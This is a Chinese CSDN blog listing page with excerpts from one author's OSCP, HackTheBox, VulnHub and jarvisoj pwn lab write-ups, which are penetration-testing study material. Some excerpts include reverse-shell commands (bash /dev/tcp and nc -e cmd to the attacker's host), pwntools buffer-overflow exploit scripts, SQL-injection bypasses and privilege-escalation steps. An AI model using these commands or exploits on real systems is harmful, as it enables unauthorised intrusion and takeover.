王嘟嘟的博客

私信 关注
Bubble_zhu
码龄4年
  • 599,105
    被访问量
  • 508
    原创文章
  • 4,425
    作者排名
  • 677
    粉丝数量
  • 于 2016-11-29 加入CSDN
获得成就
  • 获得199次点赞
  • 内容获得185次评论
  • 获得490次收藏
荣誉勋章
TA的专栏
  • oscp
    77篇
  • 漏洞复现
    1篇
  • cmder
    12篇
  • kali
    1篇
  • 《精通以太坊——实现数字合约笔记》
    1篇
  • Android逆向
    11篇
  • Android逆向修复版
    1篇
  • Q版缓冲区溢出
    1篇
  • 沉淀
    1篇
  • 成长
    2篇
  • 精通脚本黑客
    5篇
  • 工具
    5篇
  • android逆向
    14篇
  • Android逆向-操刀天下
    130篇
  • java
    1篇
  • CTF
    24篇
  • 本心
    4篇
  • 代码审计
    46篇
  • 渗透测试
    1篇
  • 汉化
    1篇
  • PHP
    4篇
  • Web前端黑客技术揭秘
    3篇
  • Head First HTML与CSS
    9篇
  • python
    14篇
  • linux
    2篇
  • 逆向
    2篇
  • Creak160
    1篇
  • javascript
    3篇
  • go
    1篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

oscp——htb——Mirai

0x00 前言这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题0x01 信息收集
原创
159阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb—— Nineveh

0x00 前言0x01 信息收集0x02 过程看到页面突然想起这个题之前应该是做过的。这里全程可以参考这个https://blog.csdn.net/qq_36869808/article/details/104094830
原创
95阅读
0评论
0点赞
发布博客于 8 月前

oscp——bof——brainpan

0x00 前言学习brainpan,这个是看了前辈的教程才做出来的。前辈地址:https://blog.csdn.net/zhalang8324/article/details/904775240x01 Wp看了oscp的教程但是感觉始终不得其道,所以想要练习练习。总结了一下流程,emmm基本就是以下流程确定偏移量确定JMP ESP确定badcharshellcode加上其实还是有很多疑问的这里ida看到了这个跟进,发现是一个strcpy的缓存区溢出但是有一个问题就是,这里
原创
161阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb——Blocky

0x00 前言0x01 信息收集0x02 Web——Webshell这个机子是我第一次遇到这种,也算是涨经验了吧看到是一个wp的站,马上使用wpscan这里知道了一个新的东西http://10.10.10.37/plugins/ 这个文件夹下居然有东西看一下jar包,发现账号密码,根据wp的扫描用户 notch进行登录使用 notch/8YsqfCTnvxAUeduzjNSXe22 登录0x02 Webshell——Rootshell...
原创
97阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb——Calamity(只做了一半)

0x00 前言0x01 信息收集这里开了80端口0x02 Web——Webshell扫目录发现一个admin账号然后狗的是F12可以获取到密码????然后登录成功admin/skoupidotenekes这里可以执行一个php文件<?php system("id")?>...
原创
81阅读
0评论
0点赞
发布博客于 8 月前

jarvisoj——Test Your Memory

题目Wp基本项检查,32位,开了NX,got表可写这里看到alphanum_2626和mem_test跟进mem_test,可以看到是scanf这里可以看到偏移,直接上payload这里一定要有返回地址,不然程序奔溃之后看不到flagfrom pwn import *sh = remote("pwn2.jarvisoj.com",9876)e=ELF('./TestYourMemory')sys_addr=e.symbols['system']cat_flag_addr=e
原创
79阅读
0评论
0点赞
发布博客于 8 月前

jarvisoj——Guess

题目Wp查一下基础项这道题卡了很久,实际上最核心的是 char数组 129时=-1前面这些通过socket进行连接,和主题无关看到head可以看到这里才是关键的地方看到这里可以知道,实际上就是把bin_by_hex值和flag进行对比内存中bin_by_hex和flag相差0x40我们可以通过char数组溢出的方法进行查看falg,129=-1,依次类推然后再对flag进行爆破from pwn import *io = remote('pwn.jarvisoj.com',
原创
63阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb——Europa

0x00 前言0x01 信息收集0x02 Web——Webshell
原创
67阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb——Bank

0x00 前言0x01 信息收集0x02 Web——Webshell这里看到53 DNS开放,而且web是apache默认页面,应该是要进行一个域名的绑定。这里为什么是bank.htb,我也不知道为啥,找了半天也没找到缘由。10.10.10.29 bank.htb www.bank.htb ns.bank.htb chris.bank.htb这里跑目录发现一个http://bank.htb/support.php访问一下,将302改为200这里从burp来看可以看的很清楚这里上
原创
106阅读
0评论
0点赞
发布博客于 8 月前

oscp——htb——Haircut

0x00 前言0x01 信息收集0x02 Web——Webshell访问看到这种10个有9个要扫目录,找到了一个exposed.php这里可以看到执行了一个curl的命令上一个马。拿到一个shell0x03 Webshell——RootShell获取一下suid,看到一个screen,这个之前vulhub做过一次,有笔记。提权www-data@haircut:/tmp$ cd /etcwww-data@haircut:/etc$ chmod +x /tmp/root
原创
84阅读
0评论
0点赞
发布博客于 8 月前

jarvisoj——[XMAN]]level2(x64)

题目Wp这里检查一下基础项这里看了一下,发现还是read这里出现了问题,需要进行覆盖构造一下payloadfrom pwn import *r=process("./level2_x64")#r=remote('pwn2.jarvisoj.com',9882)e=ELF('./level2_x64')sys_addr=e.symbols['system']bin_addr=e.search("/bin/sh").next()pop_rdi=0x4006b3payload='
原创
91阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——[XMAN]level4

题目Wp检查基础项,有NX保护ida看的时候还是之前的那种,但是没有给lib,需要自己去找那么这里第一步,肯定是找到system的地址第二步将/bin/sh写入bss字段第三部调用即可
原创
136阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——[XMAN]level3

题目Wp查一下常规,开了NX,NX开了之后就不能执行自己的shellcode了。ida看一下,依旧是这里存在缓存区溢出首先填充字段就是’A’*88+‘B’*4然后找到system的地址 00040310readelf -s libc-2.19.so |grep system返回地址随便,现在找参数bin,现在可以看到是162d4cstrings -atx libc-2.19.so |grep /bin现在还需要使用write来读出真实的offectfrom pwn imp
原创
70阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——[XMAN]level2

题目Wp查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。ida看一下常规的调用,然后看vulnerable_function函数很明显的read缓存区溢出,溢出大小为0x88很好玩的是这个题中有/bin/sh,地址为0x0804A024最后溢出结果就是0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数那么最后脚本就是:from pwn import *sh=remote("pwn2.jarvisoj.co
原创
71阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——[XMAN]level1

题目Wp先查一下基本的内容可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了这里可以看到print打印了buf的地址这里写一个pwntools的脚本from pwn import *sh = remote("pwn2.jarvisoj.com",9877)shellcode = asm(shellcraft.i386.
原创
81阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——[XMAN]level0

题目Wp拿下来之后发现是一个64位的,直接开idamain函数,现在对main函数已经很熟悉了这里看到一个方法这里按照规则覆盖即可。脚本from pwn import *sh=remote("pwn2.jarvisoj.com","9881")data="A"*136+p64(0x400596)sh.sendline(data)sh.interactive()sh.close()...
原创
152阅读
0评论
0点赞
发布博客于 9 月前

jarvisoj——Tell Me Something

本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。题目Wp这里首先下载,然后ida打开,看到main函数main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。然后这里可以看到有一个good_gaem可以看到是读取了一个flag.txt的文件。那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。最后就是先覆盖136的自身,然后加上good_game的地址即可。pwntoolsfro
原创
137阅读
0评论
0点赞
发布博客于 9 月前

oscp——htb——Joker

0x00 前言这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。0x01 信息收集0x02 Web——Webshell这里有一个3128开放,我找了历史漏洞但是都没有利用成功。最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。使用tftp进行连接然后获取squid相关内容/etc/squid/squid.conf/etc/squ
原创
176阅读
0评论
0点赞
发布博客于 9 月前

oscp——htb——Sneaky(未完成待续)

0x00 前言0x01 信息收集扫目录可以发现一个dev0x02 Web访问之后发现是一个登录界面,使用万能密码发现可以直接进去这里得到两个账号admin,thrasivoulos点击my key,可以得到一个私钥但是机器没有开启22ssh,好了我自己走到这里就卡死了。...
原创
96阅读
0评论
0点赞
发布博客于 9 月前

oscp——htb——Lazy

0x00 前言0x01 信息收集0x02 Web
原创
5243阅读
0评论
0点赞
发布博客于 9 月前

oscp——htb——Brainfuck(环境问题,未完待续)

0x00 前言0x01 信息收集root@kali:~# nmap 10.10.10.17Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-29 01:06 EDTNmap scan report for brainfuck.htb (10.10.10.17)Host is up (0.29s latency).Not shown: 995 filtered portsPORT STATE SERVICE22/tcp open
原创
190阅读
0评论
0点赞
发布博客于 9 月前

oscp——htb——Tenten

0x00 前言0x01 信息收集0x02 Web——USershell首先来看下80端口的内容,可以看到是一个wp的站点使用wpscan扫描获取到一个插件job-manager,还有一个用户名:takis暂时无可利用的地方,这个看到这里发现如下的内容这里看到8,应该是可以遍历的使用burp进行遍历,发现在13的地方出现问题,这种应该是参数13的意思这里知道有一个job-manager的洞,CVE-2015-6668,找到了文件的路径http://10.10.10.10/wp
原创
150阅读
0评论
0点赞
发布博客于 10 月前

oscp——HTB——Cronos

0x00 前言0x01 信息收集0x02 Web——Webshell这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。看到开放了53端口,知道是开启了dns服务使用nslookupnslookupserver 10.10.10.1310.10.10.13这类可以看到10.10.10.13的相对应的域名查看一下其他的域名dig axfr cronos.htb @10.10.10.13这里可以看到还有其他的域测试admin.cronos.htb,发现这里是一个
原创
150阅读
0评论
0点赞
发布博客于 10 月前

5月26日 签到

 
发布Blink于 10 月前

oscp——HTB——Optimum

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点,看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...
原创
174阅读
0评论
0点赞
发布博客于 10 月前
oscp——HTB——Bastard
发布Blink于 10 月前

oscp——HTB——Bastard

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp
原创
244阅读
0评论
0点赞
发布博客于 11 月前

oscp——HTB——Devel

0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21,由于我这里有一点问题,所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马,然后直接put上传msf监听,访问cs.aspx会弹回来一个shell
原创
129阅读
0评论
0点赞
发布博客于 11 月前
oscp——Os-hackNos-1
发布Blink于 11 月前
oscp——/dev/random: Pipe
发布Blink于 11 月前
oscp——HTB——Beep
发布Blink于 1 年前
oscp——HA: Wordy
发布Blink于 1 年前
oscp——PRIMER: 1.0.1
发布Blink于 1 年前
oscp——HTB——Legacy
发布Blink于 1 年前
oscp——HTB——Popcorn
发布Blink于 1 年前
oscp——HTB——Beep
发布Blink于 1 年前

oscp——HTB——Beep

0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞,下载下来,然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。...
原创
225阅读
0评论
0点赞
发布博客于 1 年前

oscp——HTB——Popcorn

0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test,果断扫目录。拿到目录:http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test,phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件,并使用burp拦截,并且修改
原创
255阅读
0评论
0点赞
发布博客于 1 年前
自定义win下环境盒子开发-总纲
发布Blink于 1 年前
oscp——HA: Wordy
发布Blink于 1 年前

希望能抽中鼠标垫

 
发布Blink于 1 年前

oscp——HTB——Legacy

0x00 前言乘着网好,赶紧做一做。难度入门 1级 (基本没啥难度)0x01 信息收集常规上nmap看了一下目标版本,这里是2003看到这里看到445以及版本,永恒之蓝没得跑了。0x02 usershell and rootshell可以直接开启msf,进行搜索search smb获取到shell首先是找到user.txt然后找到root.txt...
原创
182阅读
0评论
0点赞
发布博客于 1 年前

oscp——HTB—— Lame

0x00 前言vulnhub下载,搞环境搞的人心累,还不如试试HTB~难度入门 1级 (基本没啥难度)0x01 信息收集常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。0x02 usershell and rootshell我是做完之后回来写的,这里可以直接拿到两个flag看到samba,拿msf 看一下版本use auxiliary/scanner/smb/s...
原创
275阅读
0评论
0点赞
发布博客于 1 年前
CVE-2014-6271漏洞复现
发布Blink于 1 年前
oscp——DC-1
发布Blink于 1 年前
oscp——vulnhub目录总览
发布Blink于 1 年前
oscp——PRIMER: 1.0.1
发布Blink于 1 年前

Termite-20180926 版本.zip

原作者已经下架,版本:free 1.8.4,卖的太贵了,哪有那么多的积分。。。。所以还是低一点比较好
zip
发布资源于 1 年前

oscp——PRIMER: 1.0.1

0x00 目标资料43链接https://www.vulnhub.com/entry/primer-101,136/难度推荐 1Web——UserShell 1环境搭建VM0x01 信息收集IP端口0x02 Web——UserShell照例,访问一下Web的站点,看看是啥样子的。看到一个登录框,这里直接检测sql注入,可以看到是存在注入的。这里本来在test下...
原创
133阅读
0评论
0点赞
发布博客于 1 年前

我也来一个,大家一起来督促学习鸭,软件是番茄ToDo,emmm我不是打广告的,单纯邀请一起学习。 我正在番茄ToDo的自习室里学习,快来加入一起组队学习吧~加入码:19A20C7F,软件下载地址:https://a.app.qq.com/o/simple.jsp?pkgname=com.plan.kot32.tomatotime

发布Blink于 1 年前

oscp——vulnhub目录总览

0x00 前言这里记录并且导航已经完成的vulnhub文章,不提供任何提示。0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。...
原创
288阅读
0评论
0点赞
发布博客于 1 年前

oscp——vulnhub目录总览(提示&知识点总结)

0x00 前言这里记录并且导航已经完成的vulnhub文章,拥有提示以及&知识点总结0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。提示提示一:修改x-forwarded-for头提示二:ssh爆破提示三:sudo -l知识点越权ssh爆破凡是用户名相同,则密码很大概率相同sudo -...
原创
278阅读
0评论
0点赞
发布博客于 1 年前
XXE初探
发布Blink于 1 年前

oscp——/dev/random: Pipe

0x00 目标资料42链接https://www.vulnhub.com/entry/devrandom-pipe,124/难度推荐 4Web——Webshell 2Webshell——Rootshell 2环境搭建VMbox0x01 信息收集IP端口0x02 Web——Webshell首先访问一下目标的Web页面,看到了是一个需要登录的地方。这里尝试使用pos...
原创
124阅读
0评论
0点赞
发布博客于 1 年前

oscp——NullByte: 1

0x00 目标资料 41链接https://www.vulnhub.com/entry/nullbyte-1,126/难度推荐 4Web——Usershell 3Usershell——Rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell这里访问一下web照例扫一下目标的目录这里可以看到有一个phpmyadm...
原创
169阅读
0评论
0点赞
发布博客于 1 年前

oscp——Tr0ll: 1

# 0x00 目标资料## 链接https://www.vulnhub.com/entry/tr0ll-1,100/## 难度推荐 5- 思路 2- Web80——UserShell 2- UserShell——Rootshel 1## 环境搭建- VM...
原创
141阅读
0评论
0点赞
发布博客于 1 年前

现在csdn这么炫酷的吗,有意思

 
发布Blink于 1 年前

oscp——Hell: 1

0x00 目标资料 39链接https://www.vulnhub.com/entry/hell-1,95/难度推荐 3环境搭建VMbox0x01 信息收集IP端口0x02 Web首先访问一下web页面对目标进行一下目录遍历,发现如下目录这里的manual是一个apache的默认目录personal内容如下还有一个robots.txt 文件访问一下这里访...
原创
1328阅读
0评论
0点赞
发布博客于 1 年前

oscp——SecOS: 1

0x00 目标资料 38链接https://www.vulnhub.com/entry/secos-1,88/难度推荐 3思路 1web——usershell 1usershell——rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell拿到之后,访问一下8081端口然后看到一个注册的界面,进行用户的注册,...
原创
1229阅读
0评论
0点赞
发布博客于 1 年前

oscp——Bot Challenges: RA1NXing Bots

0x00 目标资料 37链接https://www.vulnhub.com/entry/bot-challenges-ra1nxing-bots,52/难度推荐 3思路 1web——webshell 1.5webshell——rootshel 0.5环境搭建vmbox0x01 信息收集IPmasscan 192.168.124.1/24 --ping --rate 1...
原创
1336阅读
0评论
0点赞
发布博客于 1 年前

oscp——Kioptrix: Level 1.3 (#4)

0x00 目标资料 36链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/难度推荐 4思路 1端口 0.5web——usershell 1usershell——rootshell 1.5环境搭建VMware下载下来之后是一个vmdx的文件,所以要经过处理这里新建一个虚拟机,选择其他移除原来的硬盘加载下...
原创
386阅读
0评论
0点赞
发布博客于 1 年前

oscp——xerxes-1

0x00 目标资料 35链接https://www.vulnhub.com/entry/xerxes-1,58/难度推荐 4思路 1环境搭建vmbox0x01 信息收集IP masscan 192.168.124.1/24 --ping --rate 1000000000000000000000000000000端口nmap -A 192.168.124.15...
原创
155阅读
0评论
0点赞
发布博客于 1 年前

oscp——Hackademic: RTB2

0x00 前言这是第34台机子啦。0x01 信息收集0x02 Web80——webshell访问一下80端口的内容这里使用万能密码进行绕过,获取到秘钥先进行一个url的解码然后进行ascii解码先将空格去除00110001 00110000 00110000 00110001 00111010 00110001 00110001 ...
原创
311阅读
0评论
0点赞
发布博客于 1 年前

oscp——Hackademic: RTB1

0x00 前言这是第33台机子啦0x01 信息收集0x02 Web80——webshell访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。这里找到了一个特别的url,这里测试了一下sql注入http://192.168.25.207/Hackademic_RTB1/?cat=1拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录写一个反弹s...
原创
239阅读
0评论
0点赞
发布博客于 1 年前

oscp——Kioptrix: Level 1.1 (#2)

0x00 前言第三十二台机子0x01 信息收集0x02 Web80-webshell访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码成功进入后台,可以看到是一个执行ping命令的执行窗口这里反弹一下shell,这里使用bash -i >& /dev/tcp/192.168.0.111/1234 >&1然后在/...
原创
815阅读
0评论
0点赞
发布博客于 1 年前

oscp——HA: Wordy

0x00 前言这个是做的第31台机子了。0x01 信息收集0x02 Web访问一下然后跑一下目录,拿到一个目录http://192.168.0.117/wordpress/是一个wp的站,扫一下插件和用户这里mail-masta查一下洞有一个EIF还有一个sql需要账号密码reflex gallery这个插件的洞,有一个文件上传,进行上传site edit...
原创
896阅读
0评论
0点赞
发布博客于 1 年前

oscp——EVM:1

0x00 前言这个是做的第30台机子了。难度很低,基本webshell拿到手就ok了0x01 信息收集0x02 端口samba没找到什么内容0x03 Web访问为默认页面进行目录遍历找到一个wp的站然后扫一下插件,以及用户发现一个插件有EIF但是没法拿到shell爆破用户拿到账号密码登录之后反弹shell随便看一看。。。就拿到flag了。。。0x0...
原创
119阅读
0评论
0点赞
发布博客于 1 年前

oscp——In Plain Sight: 1.0.1

0x00 前言这个是第29台机子,难度感觉不在题目,而在脑洞和细心。0x01 信息收集0x02 端口ftp这里找到了一点东西,有一个文件,翻译一下0x03 Web访问之后发现是一个WP的站绑定下host对wp站进行一个扫描找到一个账号但是我爆破半天没反应。之后在默认页面看到了 index.htnl,注意是 index.htnl看到了一张图片点击之后到了这里上...
原创
169阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-8

0x00 前言这个是第28台机子,这个机子的难度实际并不是很大,只是很多东西都没有接触过。0x01 信息收集0x02 Web访问一下目标页面扫目录,发现一个0的文件打开之后发现是一个drupal的站这里发现一个nid的参数,试一下sql注入存在sql注入找到密码用john跑出来了一个密码找到登录页面进行登录,登录之后选择contact us,然后点击Webf...
原创
151阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-7

0x00 前言这个是第27台机子,这个机子个人以为还是有点费脑子的。0x01 信息收集0x02 Web访问一下web页面 是一个Drupal的站试了试我多个exp 都没用,最后看了提示才知道要去推特上找 Dc7User这个人然后找到了这里,有一个账号密码 dc7user MdR3xOgB7#dW这里成功登陆看到有邮件提示这里看到这个sh的内容看到大佬说的这...
原创
319阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-6

0x00 前言这个是第26台机子,难度感觉就在wp的插件上了。其他的都没什么0x01 信息收集0x00 Web首先绑定下域名wp站,然后wpscan扫一下,这里发现了一些用户在下载网页上有这样一个提示然后生成字典进行爆破拿到一个账号密码mark, Password: helpdesk01登录之后发现有一个activity monitor插件找一下漏洞dump下...
原创
112阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-5

0x00 前言这个是第二十五台机子了,还是没有做出来,不过学到了新的东西0x01 信息收集1.ip2.端口0x02 Web这里直接访问,发现是一个介绍内容跑一下目录发现footer.php和thankyou.php访问thankyou.phpfooter.php这里看了大佬的wp才知道可能有EIFhttp://192.168.0.149/thankyou.php...
原创
149阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-4

0x00 前言这个是第二十四台机子了,终于这台机子是自己独立完成的了。0x01 信息收集0x02 端口首先访问一下目标站点可以爆破,爆破拿到密码 happy然后进行登录找到一个命令执行反弹一下shell在/home/jim/backups目录下找到一个密码,试试ssh爆破jim jibril04然后ssh连接之后可以看到一份邮件,拿到Charles得到账号密...
原创
117阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-3

0x00 前言这个是第二十三台机子了,这台机子里的东西全部都是新的东西,值得做的必要0x01 信息收集0x02 Web访问一下网站通过wappalyzer进行判断是一个joomla的cms,用工具扫描一下然后找一下相关漏洞发现存在sql注入-m dump下来可以看到通过sqlmap可以拿到一个账号和加密的密码然后使用john进行爆破,可以拿到一个账号密码ad...
原创
203阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-2

0x00 前言第二十二台机子了,继续努力鸭0x01 信息收集全端口扫描0x01 Web修改host之后发现是一个wp的站打开flag,有一个提示,用 cewl收集密码先用wpscan跑一下然后cewl 收集密码cewl http://dc-2/ -w ./wordlist.txt使用wpscan进行爆破,我们可以拿到两个账号的账号和密码tom, Passwor...
原创
168阅读
0评论
0点赞
发布博客于 1 年前

oscp——DC-1

0x00 前言这个是第二十一台机子,现在准备复习两台旧的,做一台新的。加油。0x01 信息收集IP端口信息0x02 测试提取->webshell访问发现是一个Drupal的站,直接cve打一下简单描述下就是使用CVE-2018-7600直接拿到shell弹回来了一个shell到home目录下拿到一个flag在var目录下看到flag1查一下suidfi...
原创
389阅读
0评论
0点赞
发布博客于 1 年前

oscp——Os-hackNos-1

0x00 前言这个是第十九台机子了,感觉有点感觉了,但是还是差一点东西。54ix5aW96ICB5amG链接https://www.vulnhub.com/entry/hacknos-os-hacknos,401/0x01 信息收集ip端口0x02 攻击1.端口端口无果2.web访问80端口然后进行目录遍历,可以看到一个是一个drupal的cms先判断下版本...
原创
532阅读
0评论
0点赞
发布博客于 1 年前

oscp——hackNos: Os-Hax

0x00 前言这个是第十九台机子了, 不知不觉已经做了这么多东西了。最后,我们来一个现学现用Dear E-Commerce professional ; This letter was speciallyselected to be sent to you . We will comply with allremoval requests ! This mail is being sen...
原创
283阅读
0评论
0点赞
发布博客于 1 年前

oscp——Os-hackNos-3

0x00 前言这个是第十八台机子了,之前做过同系列的Os-hackNos-2.1。最后,E788B1E88081E5A986E5939F链接https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/0x01 信息收集ip端口0x02 攻击端口端口未果Web80端口访问一下,dirbdirb爆破结果dirb htt...
原创
472阅读
0评论
0点赞
发布博客于 1 年前

oscp——Kioptrix: Level 1 (#1)

0x00 前言这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下链接https://www.vulnhub.com/entry/kioptrix-level-1-1,22/0x01 信息收集1.IP2.端口0x02 攻击1.端口这里可以看到80端口开放了OpenSSL使用nikto进行扫描(我记得oscp考试貌似不让使用工具)nikto -host 192....
原创
390阅读
0评论
0点赞
发布博客于 1 年前

oscp——EnuBox:Matterest

0x00 前言这个是第十六台机子了,这个机子是非常狗的。感谢推特上大佬的wp,才能有幸做完这台机子,真是见识浅薄了。E788B1E88081E5A986E5939F链接https://www.vulnhub.com/entry/enubox-mattermost,414/wphttps://www.guldilo.de/enubox-mattermost-vulnhub/0x01 信...
原创
433阅读
0评论
0点赞
发布博客于 1 年前

oscp——Os-hackNos-2.1

0x00 前言这个是第十五台机子,这个机子是做了一小部分,然后才来写文章的。E788B1E88081E5A986E5939F链接https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/0x01 信息收集1.ip2.端口0x02 攻击1.端口攻击端口这边暂时没有可以出发的地方2.web攻击web访问一下惯例扫目录...
原创
432阅读
2评论
1点赞
发布博客于 1 年前

oscp——Hacker Fest: 2019

0x00 前言这个是第十四台机子,真的,这个是我做过的最简单的机子了,没有之一,适合练手~最后..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... !.!!! !!!!. ?.... ...!?!!.?. ..... ?.?!. ?.... ..... ...!. ..... ..... ....! .!!!! !!!!! !!!!!!...! ...
原创
208阅读
0评论
0点赞
发布博客于 1 年前

oscp——sunset: dusk

0x00 前言这个是第十三台机子,最近做vulnhub做的,一道能自己独立做出来的的都没有,简直是对自信心的打击,这个东西感觉就是在和攻略关卡一样,只能不停的提高自己的意识,等提高到一种程度的时候才可以做出一些东西。愿努力和我长存。E788B1E78E8BE5989FE5989FE88081E5A986链接0x01...
原创
484阅读
0评论
0点赞
发布博客于 1 年前

oscp——Nineveh: v0.3

0x00 前言这个是vulnhub的第十二个机子,根据朋友提供的一张表上面找的。希望一切顺利。为了方便后来者学习,我将在以后的记录中尽可能的详细,但是之前写过的文章不在重写补充,有疑问可直接问我。最后,%E7%8E%8B%E5%98%9F%E5%98%9F%E8%80%81%E5%A9%86%E6%88%91%E7%88%B1%E4%BD%A0%E5%93%9F链接https://www...
原创
1110阅读
0评论
0点赞
发布博客于 1 年前

oscp练习目录

0x00 前言这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。0x01 vulnhub总览题目链接文章链接Me and My Girlfriend 1https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/https://blog.csdn.net/qq_36...
原创
11693阅读
0评论
2点赞
发布博客于 1 年前

oscp——symfonos:5

0x00 前言这个是vulnhub的第十一台机子,其实之前在做ReconForce-01但是由于vmbox机子的问题,导致没有弄出来。所以就转手来做这个链接https://www.vulnhub.com/entry/symfonos-5,415/0x01 信息收集ip信息收集端口信息收集0x02 攻击1.端口这里开放了22,80,389,636,由于多次做题的经验,不直接进行...
原创
421阅读
8评论
0点赞
发布博客于 1 年前

oscp——DC9

0x00 前言这个是第10个vulnhub的机子,现在的计划就是我先自己做一遍,然后再做笔记,这样子的效果可能更好一点,但是也有缺点就是有一点花时间。0x01 实验1.ip收集2.端口收集0x02 攻击1.端口由于22端口未开放,所以端口不予考虑2.web打开网站看到一个搜索界面,感觉有sql注入这里存在注入这里获取到一些账号密码,进行记录。获取到另外一组账...
原创
246阅读
0评论
0点赞
发布博客于 1 年前

oscp——HTB——Postman

0x00 前言这个是第一个做的hackthebox的机子,由于这个做出来的人数比较多,所以选择了这个,不知道难度怎么样,决定做一做。0x01 实验1.信息收集(端口)这里由于不掌技巧,所以扫描花费了很久。。。。这里可以看到开放了,22,80,6379,10000所以指定扫描一下2.攻击尝试2.1 端口攻击尝试这里肯定是要先考虑一下redis,毕竟有一个未授权访问然后redi...
原创
1011阅读
6评论
0点赞
发布博客于 1 年前

oscp——five86: 2

0x00 前言这个是练习的第9个机子。接着做five86: 2,实际上由于各种原因,我是在并行做两个机子。0x01 实验1.信息收集1.1 ip1.2 端口2.攻击尝试2.1 端口攻击尝试21可以爆破,但是这里不优先进行爆破这个2.2 web攻击尝试打开访问之后(hosts绑定了的),发现是一个wp的站。之前做过,所以直接上wpscan扫出来了几个用户使用字典跑一下...
原创
564阅读
0评论
0点赞
发布博客于 1 年前

oscp——five86-1

0x00 前言这个是练习的第8个机子。同学推过来的是Five86-2,我这里先把Five86-1做了。第七个机子可能是我的环境有问题。无法进行复现。0x01 实验1.信息收集1.1 ip收集1.2开放端口2.攻击尝试2.1 端口攻击尝试22端口,暂时没有爆破2.2 web攻击尝试访问一下啥都没有。。。老规矩,简单扫一下目录可以看到有一个robots.txt看到一个o...
原创
2295阅读
0评论
0点赞
发布博客于 1 年前

oscp——symfonos:4(未完成)

0x00 前言这个是练习的第7个机子。目标地址https://www.vulnhub.com/entry/symfonos-4,347/0x01 实验1.信息收集1.1 ip收集1.2 开放端口
原创
330阅读
0评论
0点赞
发布博客于 1 年前

oscp——symfonos:3

0x00 前言这个是练习的第6个机子。目标地址https://www.vulnhub.com/entry/symfonos-3,332/参考文章https://www.wandouip.com/t5i400700/https://cloud.tencent.com/developer/article/15238990x01 实验1.信息收集1.1 ip收集1.2 开放端口...
原创
9855阅读
0评论
0点赞
发布博客于 1 年前

